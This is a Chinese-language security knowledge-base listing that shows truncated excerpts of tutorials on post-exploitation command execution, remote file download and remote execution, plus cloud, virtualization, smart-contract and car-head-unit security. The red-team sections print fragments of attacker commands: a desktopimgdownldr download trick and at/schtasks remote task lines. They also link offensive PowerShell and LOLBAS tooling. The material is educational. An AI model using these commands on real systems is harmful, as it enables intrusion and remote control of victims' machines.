信息安全技术体系

信息安全技术体系

  • 简介
  • 目录大纲
  • 最新文档

    10.4 第四节 命令执行

    这里主要是在系统上执行恶意代码,通过本地或者远程的方式在系统上执行恶意代码,从而控制目标系统。 powershell https://github.com/tobor88/PowerShell-Red-Team https://github.com/D00MFist/Mystikal https://github.com/LOLBAS-Project/LOLBAS-Project.github.i……

    myh0st - 2025年10月22日 10:04

    10.4.2.1 远程下载

    在发现一个命令执行漏洞时,想要在该服务器上执行自定义程序,首先要将自己的控制软件上传上去,然后执行,而主流的操作系统包括 windows 和 linux,那么这里将总结这两种操作系统的远程上传文件的方式。 Windows 系统 Desktopimgdownldr set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr……

    myh0st - 2025年10月22日 10:02

    10.4.2.4 远程执行

    与本地执行不同,通过命令行完成在远程主机执行命令,主流服务器还是 windows 和 linux Windows at/schtask 需要先有目标服务器的权限,然后建立 smb 共享 C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD} schtasks /create /sc minute /mo ……

    myh0st - 2025年10月22日 10:00

    14.4.1 互联网跨境企业应用安全架构指南

    互联网跨境企业应用安全架构指南 全球化业务的应用安全架构落地实践 修订历史 | 日期 | 版本号 | 编写/修订人 | 备注 | | --- | --- | ------ | --- | | 2025年9月19日 | 1.0 | Max Luo | 第一版 | 文档信息 文档所有者:Max Luo 联系方式:微信公众号:白帽子罗棋琛 适用范围:全业务线(Web、Mobile、API、微服务、数据……

    myh0st - 2025年9月22日 14:59

    14.4 应用安全架构

    收录并整理各类企业的应用安全架构指南

    myh0st - 2025年9月22日 14:53

    19.5 智能合约

    一、引言 智能合约[1]作为区块链核心构成要素之一,主要用来实现可编程交易和去中心化应用(DApp),凭借其灵活多变的特性,催生了丰富的区块链应用,极大的促进了区块链生态繁荣,为传统金融、医疗保险等领域带来了巨大变革。有别于比特币交易中使用的简单脚本语言,在功能更加完备的以太坊中[2],使用图灵完备的Solidity语言来编写智能合约,以太坊智能合约工作原理如图1所示。 图1 智能合约工作原理(……

    myh0st - 2025年9月5日 16:51

    19.4 车联网

    一、简介 如今,大多数汽车都有车机,负责汽车座舱内的娱乐、联网、控制空调座椅等功能,也有人称之为座舱域控制器、多媒体系统等。近期,我们在研究了某品牌汽车的车机时,发现某个车机与其他车机的软硬件结构存在较大的差异。撰写本文,有两个目的,一是向读者尽可能多地介绍该车机的信息与破解过程,二是探讨这类车机应该如何进行防护。我们将分三个章节,分别介绍车机的结构、车机的破解过程和车机的防护思路。 二、车机的结……

    myh0st - 2025年9月5日 16:48

    19.3.5 虚拟化安全攻防

    虚拟化安全风险分析 本部分主要参考自NIST.SP.800-125Ar1 [3]。 Hypervisor信任模型 在一个Hypervisor平台中: 虚拟机是不可信的,包括虚拟机操作系统和所有用户态应用程序。 Hypervisor平台中的设备驱动是不可信的,除非它们带有安全证书。 提供虚拟机隔离的Hypervisor核心组件是可信的。 对于II型Hypervisor来说,宿主机操作系统是可信的。……

    myh0st - 2025年9月4日 17:23

    19.3.4 云原生安全攻防

    云原生 云原生指构建和运行应用以充分利用通过云交付模式交付的分布式计算。云原生应用旨在充分利用云平台特有的可扩展性、弹性和灵活性优势。根据云原生计算基金会 (CNCF) [1]的定义,云原生技术可帮助企业在公有云、私有云和混合云上构建和运行可扩展的应用。云原生方法的典型特性包括容器、服务网络、微服务、不可变基础设施以及声明式API等等。借助这些特性,企业可以获得松散耦合的弹性、可管理、可观测的系统……

    myh0st - 2025年9月4日 17:18

    19.3.3 云服务安全攻防

    公有云厂商提供的云服务种类较多,涵盖计算、容器、数据库、存储、无服务器等类别,不同的云厂商提供的云服务也不尽相同。近年来,公有云服务也不断披露出相关风险,如下所示: AWS Log4Shell热补丁漏洞 Log4Shell(CVE-2021-44228)是2021年最严重的漏洞之一。AWS为了帮助用户防御这个漏洞,针对不同的环境开源了几个热补丁解决方案。热补丁是向有漏洞的运行中的应用程序注入一个修……

    myh0st - 2025年9月4日 17:17

    myh0st